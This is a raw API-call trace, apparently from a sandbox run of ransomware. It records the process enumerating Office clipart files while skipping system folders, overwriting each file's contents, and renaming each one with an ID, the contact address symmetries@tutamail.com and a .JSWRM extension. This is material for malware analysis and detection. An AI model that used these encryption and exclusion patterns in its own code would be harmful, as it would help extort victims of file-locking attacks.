ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe867602, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1104, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151041.WMF", cAlternateFileName="")) returned 1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2=".") returned 1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="..") returned 1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="...") returned 1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="windows") returned -1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="recovery") returned -1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="perflogs") returned -1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="documents and settings") returned 1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="system volume information") returned -1 [0083.324] lstrcmpiW (lpString1="J0151041.WMF", lpString2="msocache") returned -1 [0083.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0083.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151041.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151041.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151041.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0083.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151041.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151041.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151041.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0083.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0083.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0083.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0083.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.326] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4356) returned 1 [0083.326] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1100) returned 0x205850 [0083.326] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1100, lpOverlapped=0x0) returned 1 [0083.451] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.452] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1100, lpOverlapped=0x0) returned 1 [0083.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0083.452] CloseHandle (hObject=0x314) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0083.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0083.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0083.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0083.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0083.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0083.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0083.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0083.454] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c68, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151045.WMF", cAlternateFileName="")) returned 1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2=".") returned 1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="..") returned 1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="...") returned 1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="windows") returned -1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="recovery") returned -1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="perflogs") returned -1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="documents and settings") returned 1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="system volume information") returned -1 [0083.454] lstrcmpiW (lpString1="J0151045.WMF", lpString2="msocache") returned -1 [0083.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0083.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151045.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151045.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151045.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0083.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0083.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151045.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151045.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151045.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0083.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0083.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0083.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0083.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.455] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15464) returned 1 [0083.455] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3c60) returned 0x24d210 [0083.456] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3c60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3c60, lpOverlapped=0x0) returned 1 [0083.481] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.481] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3c60, lpOverlapped=0x0) returned 1 [0083.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.481] CloseHandle (hObject=0x314) returned 1 [0083.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0083.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0083.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0083.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0083.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0083.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0083.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.482] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0083.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0083.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0083.483] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4844, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151047.WMF", cAlternateFileName="")) returned 1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2=".") returned 1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="..") returned 1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="...") returned 1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="windows") returned -1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="recovery") returned -1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="perflogs") returned -1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="documents and settings") returned 1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="system volume information") returned -1 [0083.483] lstrcmpiW (lpString1="J0151047.WMF", lpString2="msocache") returned -1 [0083.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0083.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151047.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151047.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151047.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0083.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0083.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151047.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151047.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151047.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0083.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0083.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0083.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0083.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.484] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18500) returned 1 [0083.484] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4840) returned 0x24d210 [0083.484] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4840, lpOverlapped=0x0) returned 1 [0083.539] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.539] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4840, lpOverlapped=0x0) returned 1 [0083.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.539] CloseHandle (hObject=0x314) returned 1 [0083.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0083.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0083.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0083.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0083.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0083.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0083.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0083.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0083.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0083.541] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151055.WMF", cAlternateFileName="")) returned 1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2=".") returned 1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="..") returned 1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="...") returned 1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="windows") returned -1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="recovery") returned -1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="perflogs") returned -1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="documents and settings") returned 1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="system volume information") returned -1 [0083.541] lstrcmpiW (lpString1="J0151055.WMF", lpString2="msocache") returned -1 [0083.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151055.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151055.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151055.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0083.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151055.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.542] WideCharToMultiByte (in: 